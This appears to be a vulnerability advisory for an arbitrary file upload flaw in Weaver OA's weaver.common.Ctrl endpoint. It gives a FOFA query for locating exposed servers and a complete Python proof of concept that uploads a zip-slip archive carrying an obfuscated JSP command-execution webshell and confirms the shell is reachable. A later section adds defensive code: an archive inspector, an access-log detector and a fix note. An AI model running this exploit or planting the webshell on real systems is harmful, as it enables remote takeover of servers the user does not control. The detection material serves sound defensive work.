Weaver OA weaver.common.Ctrl arbitrary file upload vulnerability

Vulnerability description

The weaver.common.Ctrl endpoint of Weaver OA (泛微OA) has an arbitrary file upload vulnerability; an attacker can exploit it to upload a webshell and take control of the server.

Affected products

Weaver OA (泛微OA)

FOFA

FOFA: app="泛微-协同办公OA"

Vulnerability reproduction

The vulnerable path is:

  /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

POC

  import zipfile
  import random
  import sys
  import requests

  def generate_random_str(randomlength=16):
      random_str = ''
      base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
      length = len(base_str) - 1
      for i in range(randomlength):
          random_str += base_str[random.randint(0, length)]
      return random_str

  mm = generate_random_str(8)
  webshell_name1 = mm+'.jsp'
  webshell_name2 = '../../../'+webshell_name1

  def file_zip():
      shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
  <%@ page import="sun.misc.BASE64Decoder" %>
  <%
  if(request.getParameter("cmd")!=null){
  BASE64Decoder decoder = new BASE64Decoder();
  Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
  Process e = (Process)
  rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
  String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
  Object[]{}), request.getParameter("cmd") );
  java.io.InputStream in = e.getInputStream();
  int a = -1;
  byte[] b = new byte[2048];
  out.print("<pre>");
  while((a=in.read(b))!=-1){
  out.println(new String(b));
  }
  out.print("</pre>");
  }
  %>
  """  ## replace the shell content
      zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
      zf.writestr(webshell_name2, shell)

  def GetShell(urllist):
      file_zip()
      print('上传文件中')
      urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
      file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
      requests.post(url=urls,files=file,timeout=60, verify=False)
      GetShellurl = urllist+'/cloudstore/'+webshell_name1
      GetShelllist = requests.get(url = GetShellurl)
      if GetShelllist.status_code == 200:
          print('利用成功webshell地址为:'+GetShellurl)
      else:
          print('未找到webshell利用失败')

  def main():
      if (len(sys.argv) == 2):
          url = sys.argv[1]
          GetShell(url)
      else:
          print("python3 poc.py http://xx.xx.xx.xx")

  if __name__ == '__main__':
      main()
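The PoC above relies on two things a defender can check for: a zip archive whose member name carries `../` traversal (so that extraction under /cloudstore/ lands the .jsp elsewhere), and the request pattern of a POST to the Ctrl endpoint with the Service_CheckApp/validateApp arguments followed by a GET for a .jsp under /cloudstore/. The following is an added example, not code from the advisory or from Weaver, that implements both checks from the defender's side: an inspector that flags traversal and .jsp members in an uploaded archive before it is extracted, and a detector that runs over access-log lines. The log format (a common combined-log shape), the log lines and the sample archive are all constructed here for illustration; the endpoint path and the /cloudstore/ drop directory are the ones stated on the page.

```python
import io
import posixpath
import re
import zipfile

# Endpoint and extraction directory as stated in the advisory above.
CTRL_ENDPOINT = "/weaver/weaver.common.Ctrl/.css"
DROP_DIR = "/cloudstore/"


def unsafe_zip_members(zip_bytes):
    """Inspect an uploaded archive BEFORE extraction and return
    (name, traverses, is_jsp) for every member that either escapes the
    extraction directory ('zip slip': absolute path or leading '..' after
    normalisation) or is a JSP that would execute if it lands in the webroot.
    A clean archive yields an empty list, which is the condition an upload
    handler should require before calling extract()."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            unixname = name.replace("\\", "/")
            norm = posixpath.normpath(unixname)
            traverses = unixname.startswith("/") or norm == ".." or norm.startswith("../")
            is_jsp = norm.lower().endswith((".jsp", ".jspx"))
            if traverses or is_jsp:
                findings.append((name, traverses, is_jsp))
    return findings


# Combined-log style line: ip ident user [time] "METHOD path proto" status ...
# (constructed format assumption; adapt the regex to the real server's log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_ctrl_upload_chain(log_lines):
    """Return alerts for (a) a POST to the Ctrl endpoint carrying the
    Service_CheckApp / validateApp arguments and (b) any later request for a
    .jsp under /cloudstore/ from the same source IP, which in the PoC is the
    attacker checking that the dropped webshell is reachable."""
    alerts = []
    uploaded_from = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m.group("ip", "method", "path")
        if (method == "POST" and path.startswith(CTRL_ENDPOINT)
                and "Service_CheckApp" in path and "validateApp" in path):
            alerts.append(("ctrl_upload", ip, path))
            uploaded_from.add(ip)
        elif (ip in uploaded_from and path.startswith(DROP_DIR)
                and path.split("?")[0].lower().endswith(".jsp")):
            alerts.append(("cloudstore_jsp_access", ip, path))
    return alerts


def build_sample_zip():
    """Constructed sample archive shaped like the PoC's: one harmless text
    member and one traversing .jsp member (content is a placeholder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("README.txt", "harmless")
        zf.writestr("../../../x.jsp", "<%-- placeholder --%>")
    return buf.getvalue()


# Constructed access-log lines reproducing the PoC's request sequence.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:10:00:01 +0800] "GET /login/Login.jsp HTTP/1.1" 200 1234',
    '10.0.0.5 - - [10/Oct/2023:10:00:02 +0800] "POST /weaver/weaver.common.Ctrl/.css'
    '?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1" 200 56',
    '10.0.0.5 - - [10/Oct/2023:10:00:03 +0800] "GET /cloudstore/Xy12Ab9q.jsp HTTP/1.1" 200 10',
    '10.0.0.9 - - [10/Oct/2023:10:00:04 +0800] "GET /cloudstore/app.css HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in unsafe_zip_members(build_sample_zip()):
        print("unsafe member:", finding)
    for alert in flag_ctrl_upload_chain(SAMPLE_LOG):
        print("alert:", alert)
```

On the sample data the archive inspector reports only `../../../x.jsp` (both traversing and a JSP; `README.txt` passes), and the log detector raises one `ctrl_upload` alert for the POST and one `cloudstore_jsp_access` alert for the follow-up GET from 10.0.0.5, while the unrelated `/cloudstore/app.css` request from 10.0.0.9 is ignored. The member-name check is the fix an extraction routine needs: normalise the name, reject anything absolute or starting with `..`, and for a directory that is served as web content also reject executable extensions.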